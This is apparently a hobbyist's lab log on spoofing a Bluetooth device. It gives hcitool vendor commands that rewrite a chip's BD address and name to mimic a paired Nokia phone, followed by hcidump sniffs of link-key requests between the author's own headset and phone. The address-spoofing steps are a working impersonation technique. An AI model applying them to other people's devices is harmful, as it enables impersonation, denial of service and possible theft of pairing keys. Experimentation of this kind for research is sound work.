This is MY lovable pet ROK. My ROK loves my Jabra. My ROK is also quite fond of my Nokia phone.  

Place fresh battery in Jabra headset. 

threat:~# hcitool inq
Inquiring ...
        00:07:A4:95:28:E2       clock offset: 0x5f15    class: 0x200404
        00:60:57:DC:32:04       clock offset: 0x274e    class: 0x500204
threat:~# hcitool scan
Scanning ...
        00:07:A4:95:28:E2       Jabra BT110
        00:60:57:DC:32:04       Nokia 3660

Pair Jabra with Nokia Phone. Use passcode 0000 and pairing will complete. 

Push connect button on Jabra. Accept connection from the Nokia. The connection 
will quickly connect and disconnect. 

Disable bluetooth on nokia, turn phone off or simply leave the area. 

threat:~# lsusb
Bus 001 Device 002: ID 0bdb:1000 Ericsson Business Mobile Networks BV
Bus 001 Device 001: ID 0000:0000
threat:~# hciconfig
hci0:   Type: USB
        BD Address: 06:05:04:03:02:01 ACL MTU: 672:10 SCO MTU: 255:255
        UP RUNNING PSCAN ISCAN
        RX bytes:807 acl:0 sco:0 events:40 errors:0
        TX bytes:665 acl:0 sco:0 commands:35 errors:0

Verify installation of Sexy ROK chip. 
threat:~# lsusb
Bus 001 Device 002: ID 0bdb:1000 Ericsson Business Mobile Networks BV
Bus 001 Device 001: ID 0000:0000
threat:~# hciconfig
hci0:   Type: USB
        BD Address: 06:05:04:03:02:01 ACL MTU: 672:10 SCO MTU: 255:255
        UP RUNNING PSCAN ISCAN
        RX bytes:807 acl:0 sco:0 events:40 errors:0
        TX bytes:665 acl:0 sco:0 commands:35 errors:0

Give the pet ROK a new bdaddr. 

threat:~#  hcitool cmd 0x3f 0x00d 04 22 dc 57 60 00
< HCI Command: ogf 0x3f, ocf 0x000d, plen 6
  04 22 DC 57 60 00
> HCI Event: 0x0e plen 4
  01 0D FC 00

Write bdaddr to the device. 
threat:~#  hcitool cmd 0x3f 0x022
< HCI Command: ogf 0x3f, ocf 0x0022, plen 0
> HCI Event: 0x0e plen 4
  01 22 FC 12

Cycle device
threat:~# hciconfig hci0 down; hciconfig hci0 up

Verify address
threat:~# hciconfig
hci0:   Type: USB
        BD Address: 00:60:57:DC:22:04 ACL MTU: 672:10 SCO MTU: 255:255
        UP RUNNING PSCAN ISCAN
        RX bytes:932 acl:0 sco:0 events:57 errors:0
        TX bytes:984 acl:0 sco:0 commands:52 errors:0

Borrow the handsets name. 
threat:~# hciconfig hci0 name "Noika 3660"
threat:~# hciconfig hci0 name
hci0:   Type: USB
        BD Address: 00:60:57:DC:22:04 ACL MTU: 672:10 SCO MTU: 255:255
        Name: 'Noika 3660'

Using the above technique you can under some circumstances impersonate a trusted device. 
As you can see we are able to have a bit of fun with this...

This is my Jabra thinking it is connecting to my Phone. It is asking for the Link Key at this point. 
I wonder if we pretend to be the Jabra if we can get the handset to send us the Key by mimicing this 
request. This was caused by pressing the connect button on the handset. 

threat:~# hcidump -x -V
HCI sniffer - Bluetooth packet analyzer ver 1.17
device: hci0 snap_len: 1028 filter: 0xffffffff
> HCI Event: Connect Request (0x04) plen 10
    bdaddr 00:07:A4:95:28:E2 class 0x20040c type ACL
< HCI Command: Accept Connection Request (0x01|0x0009) plen 7
  E2 28 95 A4 07 00 01
> HCI Event: Command Status (0x0f) plen 4
    Accept Connection Request (0x01|0x0009) status 0x00 ncmd 1
> HCI Event: Link Key Request (0x17) plen 6
  E2 28 95 A4 07 00

This is the connection the other way around. My 3660 thinks it is talking to my headset. I tell my Nokia 
handset to connect to the Jabra and I get the following sniff on my laptop. 

HCI sniffer - Bluetooth packet analyzer ver 1.17
device: hci0 snap_len: 1028 filter: 0xffffffff
> HCI Event: Connect Request (0x04) plen 10
    bdaddr 00:60:57:DC:32:04 class 0x500204 type ACL
< HCI Command: Accept Connection Request (0x01|0x0009) plen 7
  04 32 DC 57 60 00 01 
> HCI Event: Command Status (0x0f) plen 4
    Accept Connection Request (0x01|0x0009) status 0x00 ncmd 1
> HCI Event: Connect Complete (0x03) plen 11
    status 0x00 handle 1 bdaddr 00:60:57:DC:32:04 type ACL encrypt 0x00
< HCI Command: Write Link Policy Settings (0x02|0x000d) plen 4
  01 00 0F 00 
> HCI Event: Command Complete (0x0e) plen 6
    Write Link Policy Settings (0x02|0x000d) ncmd 1
    01 01 00 
< HCI Command: Change Connection Packet Type (0x01|0x000f) plen 4
  01 00 18 CC 
> ACL data: handle 1 flags 0x02 dlen 12
    L2CAP(s): Connect req: psm 1 scid 0x0042
< ACL data: handle 1 flags 0x02 dlen 16
    L2CAP(s): Connect rsp: dcid 0x0040 scid 0x0042 result 0 status 0
      Connection successful
> HCI Event: Command Status (0x0f) plen 4
    Change Connection Packet Type (0x01|0x000f) status 0x00 ncmd 0
> HCI Event: Connection Packet Type Changed (0x1d) plen 5
  00 01 00 18 CC 
> HCI Event: Command Complete (0x0e) plen 4
    Unknown (0x00|0x0000) ncmd 1
    00 
> ACL data: handle 1 flags 0x02 dlen 12
    L2CAP(s): Config req: dcid 0x0040 flags 0x00 clen 0
< ACL data: handle 1 flags 0x02 dlen 14
    L2CAP(s): Config rsp: scid 0x0042 flags 0x00 result 0 clen 0
      Success
< ACL data: handle 1 flags 0x02 dlen 12
    L2CAP(s): Config req: dcid 0x0042 flags 0x00 clen 0
> ACL data: handle 1 flags 0x02 dlen 14
    L2CAP(s): Config rsp: scid 0x0040 flags 0x00 result 0 clen 0
      Success
> ACL data: handle 1 flags 0x02 dlen 17
    L2CAP(d): cid 0x0040 len 13 [psm 1]
        SDP SS Req: tid 0x1 len 0x8
          pat uuid-16 0x111e (Handsfree)
          max 65535
          cont 00
< ACL data: handle 1 flags 0x02 dlen 22
    L2CAP(d): cid 0x0042 len 18 [psm 1]
        SDP SS Rsp: tid 0x1 len 0xd
          count 2
          handles 0x10001 0x10002
          cont 00
> ACL data: handle 1 flags 0x02 dlen 21
    L2CAP(d): cid 0x0040 len 17 [psm 1]
        SDP SA Req: tid 0x2 len 0xc
          handle 0x10001
          max 1024
          aid(s) 0x0004 (ProtocolDescList)
          cont 00
< ACL data: handle 1 flags 0x02 dlen 31
    L2CAP(d): cid 0x0042 len 27 [psm 1]
        SDP SA Rsp: tid 0x2 len 0x16
          count 19
          aid 0x0004 (ProtocolDescList)
             < < uuid-16 0x0100 (L2CAP) > <
             uuid-16 0x0003 (RFCOMM) uint 0x3 > >
          cont 00
> HCI Event: Number of Completed Packets (0x13) plen 5
  01 01 00 05 00 
> ACL data: handle 1 flags 0x02 dlen 12
    L2CAP(s): Connect req: psm 3 scid 0x0043
< ACL data: handle 1 flags 0x02 dlen 16
    L2CAP(s): Connect rsp: dcid 0x0041 scid 0x0043 result 0 status 0
      Connection successful
> ACL data: handle 1 flags 0x02 dlen 12
    L2CAP(s): Config req: dcid 0x0041 flags 0x00 clen 0
< ACL data: handle 1 flags 0x02 dlen 14
    L2CAP(s): Config rsp: scid 0x0043 flags 0x00 result 0 clen 0
      Success
< ACL data: handle 1 flags 0x02 dlen 16
    L2CAP(s): Config req: dcid 0x0043 flags 0x00 clen 4
      MTU 1024 
> ACL data: handle 1 flags 0x02 dlen 18
    L2CAP(s): Config rsp: scid 0x0041 flags 0x00 result 0 clen 4
      Success
      MTU 1024 
> ACL data: handle 1 flags 0x02 dlen 8
    L2CAP(d): cid 0x0041 len 4 [psm 3]
      RFCOMM(s): SABM: cr 1 dlci 0 pf 1 ilen 0 fcs 0x1c 
< ACL data: handle 1 flags 0x02 dlen 8
    L2CAP(d): cid 0x0043 len 4 [psm 3]
      RFCOMM(s): UA: cr 1 dlci 0 pf 1 ilen 0 fcs 0xd7 
> ACL data: handle 1 flags 0x02 dlen 18
    L2CAP(d): cid 0x0041 len 14 [psm 3]
      RFCOMM(s): PN CMD: cr 1 dlci 0 pf 0 ilen 10 fcs 0x70 mcc_len 8
      dlci 6 frame_type 0 credit_flow 15 pri 0 ack_timer 0
      frame_size 667 max_retrans 0 credits 3
< ACL data: handle 1 flags 0x02 dlen 8
    L2CAP(d): cid 0x0043 len 4 [psm 3]
      RFCOMM(s): DM: cr 1 dlci 6 pf 1 ilen 0 fcs 0xf9 
> HCI Event: Number of Completed Packets (0x13) plen 5
  01 01 00 05 00 
> ACL data: handle 1 flags 0x02 dlen 12
    L2CAP(s): Disconn req: dcid 0x0041 scid 0x0043
< ACL data: handle 1 flags 0x02 dlen 12
    L2CAP(s): Disconn rsp: dcid 0x0041 scid 0x0043


More to come... 

At the very least this can cause Dos on some devices and Loss of pairing on others.